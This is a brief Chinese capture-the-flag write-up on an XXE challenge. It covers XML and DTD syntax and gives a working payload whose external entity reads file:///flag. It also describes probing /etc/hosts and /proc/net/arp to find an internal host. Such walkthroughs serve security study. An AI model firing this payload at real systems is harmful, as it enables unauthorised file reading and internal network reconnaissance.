又是一道关于XML注入的题

xml语法:
<?xml version="1.0" encoding="UTF-8"?>  //xml声明
 
 <!DOCTYPE copyright [        //DTD(文档类型定义)
 
 <!ELEMENT note (to,reset,login)>   //定义元素
 
 <!ENTITY test SYSTEM "url">        //定义外部实体test
 
 ]>
直接抓包!
<?xml version="1.0" ?>
<!DOCTYPE note [      //note可以随意的值
<!ENTITY snowlyzz SYSTEM "file:///flag">   //定义外部实体test
]>
<user>
<username>&snowlyzz;</username>
<password>123456</password>
</user>
报错了

看看其他路径下的内容
 /etc/hosts 下只有报错内容
试试/proc/net/arp

爆装备了!
接下来访问对方IP就能获得到flag
关于XXE漏洞的全部内容:XXE










